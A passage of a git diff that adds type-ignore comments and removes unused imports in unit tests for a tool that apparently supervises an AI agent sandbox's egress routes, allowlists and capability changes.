supervise_cli.apply_capability_change # Default stubs: succeed with deterministic before/after so the # audit log shows a non-empty diff. - supervise_cli.add_route = lambda slug, content: ( + supervise_cli.add_route = lambda slug, content: ( # type: ignore '{"routes": []}\n', '{"routes": [{"host": "x"}]}\n', ) - supervise_cli.apply_allowlist_change = lambda slug, content: ( + supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore "old.example\n", content, ) - supervise_cli.fetch_current_allowlist = lambda slug: "old.example\n" - supervise_cli.apply_capability_change = lambda slug, content: ( + supervise_cli.fetch_current_allowlist = lambda slug: "old.example\n" # type: ignore + supervise_cli.apply_capability_change = lambda slug, content: ( # type: ignore "FROM old\n", content, ) @@ -231,7 +231,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase): def test_egress_block_calls_add_route_with_proposed_json(self): calls = [] - supervise_cli.add_route = lambda slug, content: ( + supervise_cli.add_route = lambda slug, content: ( # type: ignore calls.append((slug, content)) or ("before", "after") ) qp = self._enqueue_egress( @@ -250,7 +250,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase): def test_modify_passes_final_file_to_add_route(self): calls = [] - supervise_cli.add_route = lambda slug, content: ( + supervise_cli.add_route = lambda slug, content: ( # type: ignore calls.append(content) or ("before", "after") ) qp = self._enqueue_egress() @@ -262,7 +262,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase): self.assertEqual(['{"host": "edited.example"}\n'], calls) def test_apply_failure_blocks_response_and_audit(self): - supervise_cli.add_route = lambda slug, content: (_ for _ in ()).throw( + supervise_cli.add_route = lambda slug, content: (_ for _ in ()).throw( # type: ignore EgressApplyError("docker exec failed") ) qp = self._enqueue_egress() @@ -277,7 +277,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase): self.assertEqual([], read_audit_entries("egress", "dev")) def test_real_diff_lands_in_audit(self): - supervise_cli.add_route = lambda slug, content: ( + supervise_cli.add_route = lambda slug, content: ( # type: ignore '{"routes": []}\n', # before '{"routes": [{"host": "new.example"}]}\n', # after ) @@ -329,9 +329,9 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase): return supervise_cli.QueuedProposal(proposal=p, queue_dir=qdir) def test_url_host_merged_into_current_allowlist(self): - supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" + supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" # type: ignore applied = [] - supervise_cli.apply_allowlist_change = lambda slug, content: ( + supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore applied.append((slug, content)) or ("existing.example\n", content) ) @@ -348,9 +348,9 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase): self.assertNotIn("/repos/foo/bar", content) # path stripped def test_host_already_in_allowlist_is_idempotent(self): - supervise_cli.fetch_current_allowlist = lambda slug: "api.github.com\n" + supervise_cli.fetch_current_allowlist = lambda slug: "api.github.com\n" # type: ignore applied = [] - supervise_cli.apply_allowlist_change = lambda slug, content: ( + supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore applied.append(content) or ("api.github.com\n", content) ) @@ -362,8 +362,8 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase): self.assertEqual("api.github.com\n", applied[0]) def test_apply_failure_blocks_response_and_audit(self): - supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" - supervise_cli.apply_allowlist_change = lambda slug, content: (_ for _ in ()).throw( + supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" # type: ignore + supervise_cli.apply_allowlist_change = lambda slug, content: (_ for _ in ()).throw( # type: ignore PipelockApplyError("docker exec failed") ) qp = self._enqueue_pipelock() @@ -376,7 +376,7 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase): self.assertEqual([], read_audit_entries("pipelock", "dev")) def test_url_without_host_raises(self): - supervise_cli.fetch_current_allowlist = lambda slug: "" + supervise_cli.fetch_current_allowlist = lambda slug: "" # type: ignore # supervise_server's validator would catch this; if a broken # URL ever makes it through, the supervise TUI surfaces it too. qp = self._enqueue_pipelock("https:///nohost") @@ -413,7 +413,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase): def test_capability_block_calls_apply_with_proposed_file(self): calls = [] - supervise_cli.apply_capability_change = lambda slug, content: ( + supervise_cli.apply_capability_change = lambda slug, content: ( # type: ignore calls.append((slug, content)) or ("FROM old\n", content) ) qp = self._enqueue_capability("FROM bookworm\n") @@ -421,7 +421,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase): self.assertEqual([("dev", "FROM bookworm\n")], calls) def test_apply_failure_blocks_response_and_keeps_pending(self): - supervise_cli.apply_capability_change = lambda slug, content: (_ for _ in ()).throw( + supervise_cli.apply_capability_change = lambda slug, content: (_ for _ in ()).throw( # type: ignore CapabilityApplyError("teardown failed") ) qp = self._enqueue_capability() @@ -433,7 +433,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase): ) def test_no_audit_log_for_capability(self): - supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) + supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) # type: ignore qp = self._enqueue_capability() supervise_cli.approve(qp) # capability-block has no audit log per PRD 0013 — its record @@ -442,7 +442,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase): self.assertEqual([], read_audit_entries("pipelock", "dev")) def test_proposal_archived_after_apply(self): - supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) + supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) # type: ignore qp = self._enqueue_capability() supervise_cli.approve(qp) # Sidecar would normally archive after delivering the response, @@ -517,7 +517,7 @@ class TestCapabilityBlockSmolmachinesGuard(_FakeHomeMixin, unittest.TestCase): def setUp(self): self._setup_fake_home() self._original_apply_capability = supervise_cli.apply_capability_change - supervise_cli.apply_capability_change = lambda slug, content: ("", content) + supervise_cli.apply_capability_change = lambda slug, content: ("", content) # type: ignore def tearDown(self): supervise_cli.apply_capability_change = self._original_apply_capability diff --git a/tests/unit/test_supervise_cli_detail_lines.py b/tests/unit/test_supervise_cli_detail_lines.py index a535f22..da7d358 100644 --- a/tests/unit/test_supervise_cli_detail_lines.py +++ b/tests/unit/test_supervise_cli_detail_lines.py @@ -7,7 +7,6 @@ which hostname will land in pipelock's allowlist on approval.""" import unittest -from bot_bottle import supervise from bot_bottle.cli import supervise as supervise_cli from bot_bottle.supervise import ( Proposal, diff --git a/tests/unit/test_supervise_server.py b/tests/unit/test_supervise_server.py index 474d65e..a9a0985 100644 --- a/tests/unit/test_supervise_server.py +++ b/tests/unit/test_supervise_server.py @@ -16,7 +16,7 @@ from unittest.mock import patch # we mirror that by injecting bot_bottle/ onto sys.path under the # bare name `supervise`. sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / "bot_bottle")) -import supervise as _sv # noqa: E402 +import supervise as _sv # noqa: E402 # type: ignore from bot_bottle import supervise_server # noqa: E402 from bot_bottle.supervise_server import ( @@ -39,7 +39,6 @@ from bot_bottle.supervise_server import ( jsonrpc_error, jsonrpc_result, parse_jsonrpc, - serve, validate_proposed_file, ) @@ -331,7 +330,7 @@ class TestHandleToolsCall(unittest.TestCase): class TestHandleListEgressRoutes(unittest.TestCase): def test_url_error_returns_tool_error(self): class _Opener: - def open(self, *args, **kwargs): # noqa: ANN001, ANN002, ANN003 + def open(self, *args, **kwargs): # noqa: ANN001, ANN002, ANN003 # type: ignore raise OSError("egress unavailable") with patch.object(supervise_server.urllib.request, "build_opener", return_value=_Opener()): diff --git a/tests/unit/test_yaml_subset.py b/tests/unit/test_yaml_subset.py index cd800c1..11519fa 100644 --- a/tests/unit/test_yaml_subset.py +++ b/tests/unit/test_yaml_subset.py @@ -273,18 +273,18 @@ class TestRealisticBottleFile(unittest.TestCase): KnownHostKey: ssh-ed25519 AAAA... """) # Spot-check the deep parts; the structure is large. - self.assertEqual(2, len(out["egress"]["routes"])) + self.assertEqual(2, len(out["egress"]["routes"])) # type: ignore self.assertEqual( ["/didericis/"], - out["egress"]["routes"][1]["path_allowlist"], + out["egress"]["routes"][1]["path_allowlist"], # type: ignore ) self.assertEqual( "Bearer", - out["egress"]["routes"][0]["auth"]["scheme"], + out["egress"]["routes"][0]["auth"]["scheme"], # type: ignore ) self.assertEqual( "ssh-ed25519 AAAA...", - out["git"]["remotes"]["gitea.dideric.is"]["KnownHostKey"], + out["git"]["remotes"]["gitea.dideric.is"]["KnownHostKey"], # type: ignore )